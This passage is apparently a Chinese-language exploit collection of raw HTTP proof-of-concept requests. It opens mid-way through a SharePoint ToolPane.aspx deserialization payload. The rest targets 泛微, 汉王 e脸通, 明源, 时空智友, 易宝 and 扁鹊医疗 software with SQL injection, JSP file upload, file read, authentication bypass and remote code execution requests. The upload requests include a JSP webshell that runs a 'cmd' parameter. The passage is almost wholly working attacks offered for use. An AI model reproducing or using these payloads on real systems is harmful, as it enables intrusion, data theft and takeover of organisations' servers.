7af9rEj4LjJ%2F1B%2FQRC7R%2BYLwPG5%2BP934X%2BYO5efzzuP9h%2BcMg%2F9kDqf1yln3Kt8BeH%2Bo%2FL%2Bk%2BY%2F0OD%2BUf7L2qb7EODSH9HZfzrvf0e8bPC%2Bzvp5zhR%2BI%2B5%2Fsk%2BuOkPGP89%2F3Zf0R%2BqX%2FDDwXzan4DfbvjN%2Bi%2FjJ%2FtD1X%2BRfgvFf%2Bg%2F9Q%2BP6r%2Bl8IWGUX%2BI%2BkN97f3H%2Fkf8GkquH4o%2F4%2Fw1YLvUrzbxt6P4I3j%2FYf5POP%2Fk%2F9P8a3H9k74h%2FzJA%2FgvOP%2BqQ9reu8t9zP9Vf8I%2FGvWP%2Bq2zf1Qsb3DjYP9afpfY3yr%2Bqfx%2F9FelP2f%2B4HD%2Ftf6w%2Fqv%2BB%2F4%2F4T%2FHjGuI%2F9i%2FCH%2F0n1R%2Ft7xcq%2F2X%2FR%2FYxjv0bzY9A7J0u1w%2F13%2Fv%2BU%2BF%2F7R%2Fwp%2F56Vt33f7T%2FoX8wpeq%2FaP9fH%2FTXXDL%2F0H9z%2FbuKfwHrL%2Fc%2FgvWb6o%2FmK%2F6R%2FmE%2BxU%2F5y3j%2FaR%2FrL1D7D8W%2Fx3%2FC%2Fd8w0R7j73B%2FRf5Hqn7J%2F1rZfxTUvzP%2F80P%2FSfyfKv5L1f8%2Fqb9Di%2FvPXFfxg7%2F7%2FRPjvyn8MZ%2F3n4z7d8R%2Fban62z2u%2Fx7ON6Q%2F6J%2Bpvkdl%2F20x%2FrR%2F6Bnvf6gfzj%2BuqfH%2Bxf2PxfGT%2F7F76P93qv9A%2FZJ96n9Mdf4IVX0TPoGqP8SP%2FRv9D%2FGP5pf9F%2FCn%2FnNsMH8ofuBP%2Bl%2FiT%2FqD%2FYfOHwp%2Fqr9ryfkVF0f9L%2Fdf9I%2Bu6q8sxa8n65%2F3F%2Fjf4v7Dc6pKf1X%2Fhf6zTf0f7Ael%2FkBfhJoPjbt1RbOnekicnyyH44c%2BUP7p%2FIP9gfAPyvrE%2Fkn4S3U%2BK%2Fcv%2BI91W8AXsbmZ2r9MnM9a6vyA9V3g12b%2BSeR%2FVJ5fMI46ErctbFFu5xb9yQX3r4%2FGcYbd7899NY4e9NE49f%2BS92eqb6n4cxyn%2FrcF%2FgF77r8wTvkXrM9Uf5hL82ncUvVJ5x%2BD8Zfq%2FGwmKv%2FVMv6C%2Bv8esPPK%2BBPOj9AP52%2FoXw%2Fa2oP%2BwX8D%2BvZO9aeJ6q8KtT95Gfe3pB9Zia%2Fk%2BcfzeQMcofMX6esrdT5AfaK%2FtHfq%2FJGo%2BpggfvB%2FiPrGWK7w71eYf8R%2F0gdNnX9xvqbzi47%2BI2d9pvUnNtd3GR%2F6Fxva2qP%2BG%2Fx2VH1jfSfg8zXpA%2BL3K8meH9h%2FBfynHh7nT5x9DvHBP%2BQ3VPVZ3j%2Bg%2BOE%2F8StS82Ef%2B4JrY34G%2F8Ff9Ki0f6WqvkPED%2F%2B72n7%2FInwx30hU%2FkZKP%2Bj8Rv23weuTfuOaFvC%2FC7g%2FoP4G8fVL%2FDAeqfsjUukf4Qd%2BEr9RHzg7G6Hqz8j%2BcX3aP0nfPL7%2FsPcP%2BbHoDI0ecGnYutJniq%2Bv8C%2FzP1PnG%2BzvdH8D%2BF8r%2F8k%2B6sdDfJR%2FxE%2F4YbypzkfU%2F8aayu92j5%2BBvo7GwW3SX%2FCD9B3zH9lvl%2Fkt7%2F9kSp8qS%2B7vk3L%2FVPdn4B%2FhP3C4P6X8kr4hf3T%2FqFHqZ4kv%2B0%2F29%2FypcP9k%2B9d8H6tiLYO6Lejtd94P43uFjRauN2WBscyo6FliDtdBs34deVILzctJ1%2B426zvjcO%2FPMeUC59VhYsp%2BMOjMfG87S3PB9xJ75uUiMOXDO%2B24puPVtLiYrA%2F3kbNOFuT7%2B8gXq74nl34uH3peLY%2F0L%2Fr6t87vqJukkw7HbE%2FpV4s%2Fa%2F7NsXEejGunFptu2x9Yu8DTR9H1xExM8RBUpNYqnGGcJ1ki6BppxFUri7zOIrVrmj%2FoFMHAcdOBkfVzsQzs2RJ%2FT6OKc%2Bt7etb0PrNn1O02%2FreaXfFd%2BZ4%2Fik9EhfOQ2v4N%2Bb6od44YFHLlV%2Bq7f%2BT93hvxf8O2Y2bDoFJbA%2BOZX%2B2u3OvO2q%2FIXfywuT%2Fw8e%2F5LON%2BQ8y6iQbWOKp2FqHXRiwB3aMm7l9ayhZsbu7tqlwk1%2FIh6OurYCC1OBcL%2BGYnHs2zboJB5kaVZRaN9ZG1S4aW19WtcavW3TlZt3lfa9z71u%2F0bMls0r13Y%2FZtnDf%2BHdeWtKhOtIZTV3VL9%2FEbl0eO5DJHjYwTE76OahbVH3LSifJg7VboGZVYhIPZkMcnw3VkOll8H%2FNaqua2x5p0a8PIczt2ZTvEZ1yDDWnN4N%2BQ8bVn%2FdBLVqgtyu1DY6LTvCzOuP5tB3Gzdmio%2FapcBlSzmxbVq1Gvd9vN43MYrnlPx4Fow9pkKW26oF8mC3qz9gwuGn3SmaQxfKpmPvvsne1LWvru0V4BfIoovwSfs3H8ULPj%2FHIcQMfaQuH%2BTjzxPO%2Fzz2ZKY6dGQz1%2FUnHw%2B%2BTwLKlhc7AmP3ip65%2F5Zwx53hx6rnV37Xt69hKTjvaeHV9IC3SP8XWiwt51R8bBh%2B%2BN59EDI9Mk96%2FFwe7ev3BgraN%2F%2BHOySZc5dF%2F%2BdtjnjsrB9ObqvHy8%2Fexv0%2Fzgo%2FQr9aWGdvlg%2FNGj7sfffDh9e3X%2B8YXP%2BsbOd3%2FF4Or8O7%2BA8dWv9sw2xRe%2F1EPfaHnyqzxf%2FjbM1fkn39x5%2B%2Bf%2FAT299nCZKQAA%22+DataTable-CaseSensitive%3D%22false%22+runat%3D%22server%22%3E%0A%3C%2FScorecard%3AExcelDataSet%3E%0A++%3C%2Fdiv%3E%0A%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A++++
 438 | 
 439 | 
 440 | 
 441 | POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1 
 442 | Host: x.x.x.x 
 443 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 
 444 | Content-Length: 7699 
 445 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 
 446 | Accept-Encoding: gzip, deflate, br 
 447 | Connection: keep-alive 
 448 | Content-Type: application/x-www-form-urlencoded 
 449 | Referer: /_layouts/SignOut.aspx 
 450 | Connection: close 
 451 |  MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=%0A++++%3C%25%40+Register+Tagprefix%3D%22Scorecard%22+Namespace%3D%22Microsoft.PerformancePoint.Scorecards%22+Assembly%3D%22Microsoft.PerformancePoint.Scorecards.Client%2C+Version%3D16.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D71e9bce111e9429c%22+%25%3E%0A++++%3C%25%40+Register+Tagprefix%3D%22asp%22+Namespace%3D%22System.Web.UI%22+Assembly%3D%22System.Web.Extensions%2C+Version%3D4.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D31bf3856ad364e35%22+%25%3E%0A%0A%3Casp%3AUpdateProgress+ID%3D%22UpdateProgress1%22+DisplayAfter%3D%2210%22+%0Arunat%3D%22server%22+AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%3CProgressTemplate%3E%0A++%3Cdiv+class%3D%22divWaiting%22%3E++++++++++++%0A++++%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQHUGQLIi0CAkgUSAw4YjBzeIFANm8i3%2Bz37MftXsyCyRlW7Zlz07PrhymKBaqMvPkyVNZAH%2F6%2Baeffvpv%2FNBv%2Bvm3f8KL1XtYLNP8rBkuwxcnMp0vRtPizcWZRv9enDRW2XI1T98U6Wo5D7MXJ3erKBvF79KH%2FnSSFm%2BiX34Ja3HtlX5ZvUi1Xy%2F%2FlRb%2Fj0dr8ksvXZKtPw7yrBcP0zz8M941Rx8%2BmPMw%2F%2FlnGvvDP%2BPlP%2F90tV28XvAlJ9s8KxZvTk%2FVm9dbvB8ul7PX5%2BebzeZsUz2bzu%2FPK5qmnw%2B6N2rZ%2FbX5IoHVN6ereVGutniZj%2BL5dDH9sHwZT%2FPXuO6luur0ZJS8OV1M85T%2BWqTL07f%2F%2FqeTT37IrTRL87RYnhRhnn484USt9Lq9KIN9c7qcr9LD5%2B4ibazmc0y%2BmcZhlpbDT9jZ24KLsyzd9h9m6ReuOlw5nI7i9CQfFbdxvJoDJA12w%2B3%2Br1URTVdFkiZfMvflEIfp8ItO%2FpjDn85apL%2Bt0iJ%2B7pSn3ZxtigPShD%2F58Oa0pGBjmmVpvASnF2dmWqTzUXx2M1os%2F6r%2F5S%2BPWdpL52vguDhrF8t0XoTZWWs7Cwk3bx7OZun8r5XDBC%2BNztz2
 452 | 
 453 | 
 454 | 
 455 | NAME:\扁鹊医疗\扁鹊医疗GetLyfsByParams sql注入.txt
 456 | POC:
 457 | POST /AppService/BQMedical/WebServiceForFirstaidApp.asmx/GetLyfsByParams HTTP/1.1
 458 | Host: 
 459 | Accept: */*
 460 | Accept-Encoding: gzip, deflate, br, zstd
 461 | Connection: keep-alive
 462 | Content-Length: 198
 463 | Content-Type: application/x-www-form-urlencoded
 464 | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.809.0 Safari/534.0
 465 | 
 466 | strOpid=1 AND (SELECT 9054 FROM(SELECT COUNT(*),CONCAT(0x7b7e7b,(SELECT (ELT(9054=9054,1))),md5(123456),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&strTempID=1&strNumber=&strUnit=
 467 | 
 468 | NAME:\扁鹊医疗\扁鹊医疗GetMonitorList sql注入.txt
 469 | POC:
 470 | GET /AppService/BQMedical/WebServiceForFirstaidApp.asmx/GetMonitorList?UserID=1&OperatorID=1&SearchName=string%27%26%26+updatexml(1,CONCAT_WS(1,1,current_user),1)+%26%26%27 HTTP/1.1
 471 | 
 472 | NAME:\时空智友\时空智友ERP系统 updater.uploadStudioFile 文件上传.txt
 473 | POC:
 474 | POST /formservice?service=updater.uploadStudioFile HTTP/1.1
 475 | Host: 
 476 | Content-Type: application/x-www-form-urlencoded
 477 | 
 478 | content=<updater xmlns:jsp="http://java.sun.com/JSP/Page"><filename>test.jspx</filename><filepath>../../../images/</filepath><filesize>347</filesize><lmtime>{{time()}}</lmtime><jsp:scriptlet>out.println(java.util.UUID.randomUUID().toString());new java.io.File(application.getRealPath(request.getServletPath())).delete();</jsp:scriptlet></updater>
 479 | 
 480 | NAME:\时空智友\时空智友企业流程化管控系统XML外部实体注入.txt
 481 | POC:
 482 | POST /formservice?service=attachment.write&isattach=false&filename=c.jsp HTTP/1.1
 483 | Host: 
 484 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 485 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 486 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 487 | Accept-Encoding: gzip, deflate
 488 | Connection: close
 489 | Upgrade-Insecure-Requests: 1
 490 | Content-Length: 3
 491 | 
 492 | ccc
 493 | 
 494 | NAME:\明源\明源ERP ssologin.aspx身份认证绕过.txt
 495 | POC:
 496 | POST /PubPlatform/nav/login/sso/login.aspx HTTP/1.1
 497 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 498 | Accept-Encoding: gzip, deflate
 499 | Content-Type: application/x-www-form-urlencoded
 500 | 
 501 | __yzsAppSecret=test&user_info=%66%79%6d%71%35%62%49%63%78%58%5a%49%78%75%36%4b%6c%6c%73%46%49%52%32%5a%77%45%4a%4b%2b%56%45%39%35%44%6b%78%2f%43%6e%46%67%46%51%3d
 502 | 
 503 | 
 504 | 
 505 | 
 506 | -------------------------------------------------------------------------------------------------------------------------------------------
 507 | 
 508 | GET /PubPlatform/nav/home/default?_nav=0000 HTTP/1.1
 509 | Cookie: userToken=674368A4EC31B7DF719C2CB32325206859FB63D329E30D59CC3A53EBDEF8A6D4AA0370A2A4143A3AB19A87D4BFA025252EAB17A695CE7006559242EBE643C0C7B4F430890D661F14A9B51EB9C3AE1384BF7CCD020C7AC0BD8C7EA2A82E76BFA790F391FC4CA2D628D4920D5F75E02DA2A2A19512449376AE159F8003001B2295;
 510 | 
 511 | 
 512 | NAME:\易宝\易宝OA-getPosition存在sql注入.txt
 513 | POC:
 514 | GET /SmartTradeScan/StockTake/getPosition?positionName=%27%20AND%202328%20IN%20(SELECT%20(CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(2328=2328)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113)))%20AND%20%27EHJe%27=%27EHJe&stockRoomID=1&opeID=1&currentStatus=1&pickUpMode=11 HTTP/1.1
 515 | Host: 
 516 | Accept-Encoding: gzip, deflate, br
 517 | Accept-Language: en-US;q=0.9,en;q=0.8
 518 | Accept: */*
 519 | Cache-Control: max-age=0
 520 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
 521 | 
 522 | 
 523 | 
 524 | NAME:\汉王\汉王EFaceGo monadFileUpload.do 任意文件上传.txt
 525 | POC:
 526 | POST /manage/leaveList/monadFileUpload.do?recoToken=67mds2pxXQb&type HTTP/1.1
 527 | Host:
 528 | Content-Type: multipart/form-data; boundary=----WebKitFormBundaryFfJZ4P1AZBixjELj
 529 | 
 530 | ----WebKitFormBundaryFfJZ4P1AZBixjELj
 531 | Content-Disposition: form-data; name="file"; filename="ncbegw.jsp"
 532 | Content-Type: image/jpeg
 533 | 
 534 | <% out.println("pboyjnnrfipmplsukdeczudsefxmywe"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
 535 | ----WebKitFormBundaryFfJZ4P1AZBixjELj
 536 | 
 537 | NAME:\汉王\汉王EFaceGo updateVisitorMapConfig.do任意文件上传.txt
 538 | POC:
 539 | POST /manage/visitorMapConfig/updateVisitorMapConfig.do?recoToken=SGUsqvF7cVS HTTP/1.1
 540 | Host: 
 541 | 
 542 | {"id":1,"mapName":"25bdaf","fileType":"jsp","updatedPhoto":"PCUgb3V0LnByaW50bG4oInBib31qb,5yZmlwbXBsc3VrZGVjenVkc2VmeG15d2UiKTsgbmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFN1cnZsZXBQYXRoKCkpKS5kZWxldGUoKTsgJT4"}
 543 | 
 544 | NAME:\汉王\汉王EFaceGo upload.do 任意文件上传.txt
 545 | POC:
 546 | POST /manage/intercom/..%3B/..%3B/manage/resourceUpload/upload.do HTTP/1.1
 547 | Host: 
 548 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
 549 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryabcxyzqw
 550 | Content-Length: 
 551 | 
 552 | ------WebKitFormBoundaryabcxyzqw
 553 | Content-Disposition: form-data; name="file"; filename="testaa.jsp"
 554 | Content-Type: image/jpeg
 555 | 
 556 | <% out.println("asdfqwerzxcvbnmlkjhgtyuipoiuytre"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
 557 | ------WebKitFormBoundaryabcxyzqw--
 558 | 
 559 | NAME:\汉王\汉王e脸通getGroupEmployee.do SQL注入.txt
 560 | POC:
 561 | GET /manage/authMultiplePeople/getGroupEmployee.do?recoToken=67mds2pxXQb&page=1&pageSize=10&groupId=1&order=(UPDATEXML(2920,CONCAT(0x7e,@@version,0x7e,(SELECT+(ELT(123=123,1)))),8357))  HTTP/1.1
 562 | 
 563 | NAME:\汉王\汉王e脸通综合管理平台 firstPeopleOpengetDoors.do 存在SQL注入.txt
 564 | POC:
 565 | GET /manage/intercom/..;/..;/manage/firstPeopleOpen/getDoors.do?page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x2e,0x71716a7071,(SELECT+(ELT(2920=2920,1))),0x71706b7671),8357)) HTTP/1.1
 566 | Host: 
 567 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
 568 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 569 | Accept-Encoding: gzip, deflate, br
 570 | Accept-Language: en-US,en;q=0.9
 571 | Connection: close
 572 | 
 573 | NAME:\汉王\汉王e脸通综合管理平台 imgDownload.do 任意文件读取.txt
 574 | POC:
 575 | GET /manage/resourceUpload/imgDownload.do?filePath=/manage/WEB-INF/web.xml&recoToken=SGUsqvF7cVS HTTP/1.1
 576 | 
 577 | NAME:\汉王\汉王e脸通综合管理平台 queryAntisubmarineList.do 存在SQL注入.txt
 578 | POC:
 579 | GET /manage/antisubmarine/queryAntisubmarineList.do?recoToken=67mds2pxXQb&page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x7e,md5(123456),0x7e,(SELECT+(ELT(123=123,1)))),8357)) HTTP/1.1
 580 | Host: 
 581 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
 582 | Accept: */*
 583 | 
 584 | 
 585 | 
 586 | NAME:\汉王\汉王e脸通综合管理平台 queryDoorInfoList.do SQL注入.txt
 587 | POC:
 588 | GET /manage/dgmCommand/finishRegister.do/..;/..;/doorInfo/queryDoorInfoList.du?page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x2e,0x71716a7071,(SELECT+(ELT(2920=2920,1))),0x71706b7671),8357)) HTTP/1.1
 589 | Host:
 590 | 
 591 | 
 592 | 
 593 | NAME:\汉王\汉王e脸通综合管理平台 uploadBlackListFile.do 任意文件上传.txt
 594 | POC:
 595 | POST /manage/mobiVist/..%3B/systemBlackList/uploadBlackListFile.do HTTP/1.1
 596 | Host:
 597 | 
 598 | ------WebKitFormBunddaryFfJZ4P1AZBixjELj
 599 | Content-Disposition: form-data; name="file"; filename="123.jsp"
 600 | Content-Type: image/jpeg
 601 | 
 602 | <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
 603 | ------WebKitFormBunddaryFfJZ4P1AZBixjELj
 604 | 
 605 | NAME:\汉王\汉王e脸通综合管理平台exportResourceByFilePath.do任意文件读取.txt
 606 | POC:
 607 | GET /manage/leaveList/exportResourceByFilePath.do?filePath=WEB-INF/web.xml HTTP/1.1
 608 | 
 609 | NAME:\汉王\汉王getValidEmpForGroup.do SQL注入.txt
 610 | POC:
 611 | GET /manage/authMultiplePeople/getValidEmpForGroup.do?recoToken=67mds2pxXQb&page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x7e,md5(123456),0x7e,(SELECT+(ELT(123=123,1)))),8357)) HTTP/1.1
 612 | 
 613 | 
 614 | NAME:\汉王\汉王queryAlarmEvent.do SQL注入.txt
 615 | POC:
 616 | GET /manage/alarm/queryAlarmEvent.do?order=/**/&columnKey=(UPDATEXML(2,CONCAT(0x2e,0x3131313131,(SELECT+(ELT(1=1,1))),0x3131313131),8))&recoToken=ZuZBOrvLG8M HTTP/1.1
 617 | 
 618 | NAME:\汉王\汉王queryManyPeopleGroupList.do SQL注入.txt
 619 | POC:
 620 | GET /manage/authMultiplePeople/queryManyPeopleGroupList.do?recoToken=67mds2pxXQb&page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x7e,@@version,0x7e,(SELECT+(ELT(123=123,1)))),8357)) HTTP/1.1
 621 | 
 622 | NAME:\泛微\泛微-eoffice block_content.php SQL注入.txt
 623 | POC:
 624 | GET /general/new_mytable/block_content.php?block_id=1%20UNION%20ALL%20SELECT%20CONCAT(0x71787a6a71,IFNULL(CAST(md5(123456)%20AS%20NCHAR),0x20),0x7171627671)--%20- HTTP/1.1
 625 | 
 626 | 
 627 | NAME:\泛微\泛微datasource update jdbc远程代码执行.txt
 628 | POC:
 629 | 
 630 | 
 631 | POST /api/integration/datasource/update/ HTTP/1.1
 632 | Host: 
 633 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
 634 | Accept-Encoding: gzip
 635 | Connection: keep-alive
 636 | Content-Length: 377
 637 | Content-Type: application/x-www-form-urlencoded
 638 | Cookie: __clusterSessionIDCookieName=adcf474c-8ca4-4002-b0d7-ce6e32486666;__clusterSessionCookieName=4D368CCF5613FEED9A080A2013810BDE;
 639 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
 640 | 
 641 | pointid=aaa&type=sqlserver2025&iscluster=2&username=333&port=1&dbname=aaaa&password=11&usepool=1&minconn=5&maxconn=10&sortid=1&id=1&operate=test&host=abc&url=jdbc:h2:mem:test;MODE=MSSQLSERVER;INIT=CREATE ALIAS EXEC AS $$ String exec(String cmd) throws java.lang.Exception { return java.lang.Runtime.getRuntime().exec(cmd).getInputStream().toString(); } $$\;CALL EXEC('whoami');
 642 | 
 643 | NAME:\泛微\泛微E-cology9 前台SQL注入.txt
 644 | POC:
 645 | POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
 646 | Host: 
 647 | Cache-Control: max-age=0
 648 | Upgrade-Insecure-Requests: 1
 649 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
 650 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
 651 | Accept-Encoding: gzip, deflate
 652 | Accept-Language: zh-CN,zh;q=0.9
 653 | Cookie: ecology_JSessionId=abc49y8JvMcoqhSkCv02w; testBanCookie=testConnection: close
 654 | Content-Type: application/x-www-form-urlencoded
 655 | Content-Length: 2236
 656 | Upgrade-Insecure-Requests: 1
 657 | 
 658 | formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0
 659 | 
 660 | NAME:\泛微\泛微ecology9FileDownloadLocation任意文件下载漏洞.txt
 661 | POC:
 662 | GET /weaver/weaver.email.FileDownloadLocation/login/LoginSSOxjsp/x.FileDownloadLocation?ddcode=7ea7ef3c41d67297&downfiletype=eml&download=1&mailId=1123+union+select+*+from+(select+1+as+resourceid,'../ecology/WEB-INF/prop/mobilemode.properties'+as+x2,'3'+as+x3,(select++*+from+(select+*+from+(select+password+from+HrmResourceManager+where+id=1)x)x)+as+x4,5+as+x5,6+as+x6)x+where+1=1&mailid=action.WorkflowFnaEffectNew&parentid=0 HTTP/1.1
 663 | 
 664 | NAME:\泛微\泛微EcologyjQueryfiletree.jsp目录遍历漏洞.txt
 665 | POC:
 666 | GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1
 667 | 
 668 | NAME:\泛微\泛微remarkOperate远程命令执行.txt
 669 | POC:
 670 | POST /api/workflow/reqform/remarkOperate HTTP/1.1
 671 | Host:
 672 | 
 673 | {
 674 |   "operate": "save",
 675 |   "field5": "5241,5240",
 676 |   "IsBeForwardSubmitAlready": "1",
 677 |   "IsBeForwardAlready": "0",
 678 |   "IsSubmitedOpinion": "1",
 679 |   "IsBeForwardTodo": "0",
 680 |   "forwardflag": "1",
 681 |   "requestid": "5288726",
 682 |   "nodeid": "11995",
 683 |   "f_weaver_belongto_userid": "5240",
 684 |   "f_weaver_belongto_usertype": "0",
 685 |   "signworkflowids": "",
 686 |   "signdocids": "",
 687 |   "remarkLocation": "",
 688 |   "remark": "${T(java.lang.Runtime).getRuntime().exec('ping baidu.com')}",
 689 |   "remindTypes": "0,2"
 690 | }
 691 | 
 692 | 
 693 | NAME:\泛微\泛微OA前台登录绕过+后台组合拳RCE\泛微OA前台登录绕过权限绕过dwrcallplainc.txt
 694 | POC:
 695 | 泛微	泛微OA前台登录绕过	权限绕过	未知	/dwr/call/plaincall/
 696 | /mobilemode/mobile/server.jsp
 697 | /weaver/ImgFileDownload/a.swf	
 698 | POST /dwr/call/plaincall/?callCount=1&c0-id=1&c0-scriptName=WorkflowSubwfSetUtil&c0-methodName=LoadTemplateProp&batchId=a&c0-param0=string:mobilemode&scriptSessionId=1&a=.swf HTTP/1.1
 699 | Host: xxx:xxxx
 700 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
 701 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 702 | Accept-Encoding: gzip, deflate
 703 | Accept-Language: zh-CN,zh;q=0.9
 704 | Upgrade-Insecure-Requests: 1
 705 | 
 706 | 
 707 | 
 708 | 
 709 | GET /mobilemode/mobile/server.jsp?invoker=com.api.mobilemode.web.mobile.service.MobileEntranceAction&action=meta&appid=1&appHomepageId=1&mTokenFrom=QRCode&mToken=BAAD7750912407C15FBC7CA2BDA4BDDDAEACE215E26BB871CE8D171028A66A70&_ec_ismobile=true&timeZoneOffset=&a=.swf HTTP/1.1
 710 | Host: xxxx:xxxx
 711 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
 712 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 713 | Accept-Encoding: gzip, deflate
 714 | Accept-Language: zh-CN,zh;q=0.9
 715 | Upgrade-Insecure-Requests: 1
 716 | 
 717 | 
 718 | 
 719 | 
 720 | GET /weaver/ImgFileDownload/a.swf?sessionkey=b20e3665-d8a8-403d-a041-0c5883626da4&a=.swf HTTP/1.1
 721 | Host: xxxx:xxxx
 722 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
 723 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 724 | Accept-Encoding: gzip, deflate
 725 | Accept-Language: zh-CN,zh;q=0.9
 726 | Upgrade-Insecure-Requests: 1	更新设备规则	0702	1day	AdySec																	
 727 | 
 728 | NAME:\泛微\泛微OA前台登录绕过+后台组合拳RCE\泛微后台rce20250701.txt
 729 | POC:
 730 | POST /interface/outter/outter_encryptclassOperation.jsp?a=1.swf HTTP/1.1
 731 | Host: xxxx:xxx
 732 | If-None-Match: "6evu6PUo/Cz"
 733 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
 734 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 735 | Accept-Encoding: gzip, deflate
 736 | If-Modified-Since: Thu, 23 Jun 2022 11:04:04 GMT
 737 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVnIIu
 738 | Cache-Control: max-age=0
 739 | Upgrade-Insecure-Requests: 1
 740 | Accept-Language: zh-CN,zh;q=0.9
 741 | Cookie: ecology_JSessionid=aaa_db33mBm_EaOGEO8bz; __randcode__=b7e3d245-5b6b-44ba-b06b-f4b5592d68dc
 742 | 
 743 | 
 744 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
 745 | Content-Disposition: form-data; name="operation"
 746 | 
 747 | add
 748 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
 749 | Content-Disposition: form-data; name="encryptname"
 750 | 
 751 | ttttaaa
 752 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
 753 | Content-Disposition: form-data; name="encryptclass"
 754 | 
 755 | org.mvel2.sh.ShellSession
 756 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
 757 | Content-Disposition: form-data; name="encryptmethod"
 758 | 
 759 | exec
 760 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
 761 | Content-Disposition: form-data; name="decryptmethod"
 762 | 
 763 | exec
 764 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
 765 | Content-Disposition: form-data; name="isdialog"
 766 | 
 767 | 0
 768 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
 769 | Content-Disposition: form-data; name="x"; filename="x"
 770 | 
 771 | x
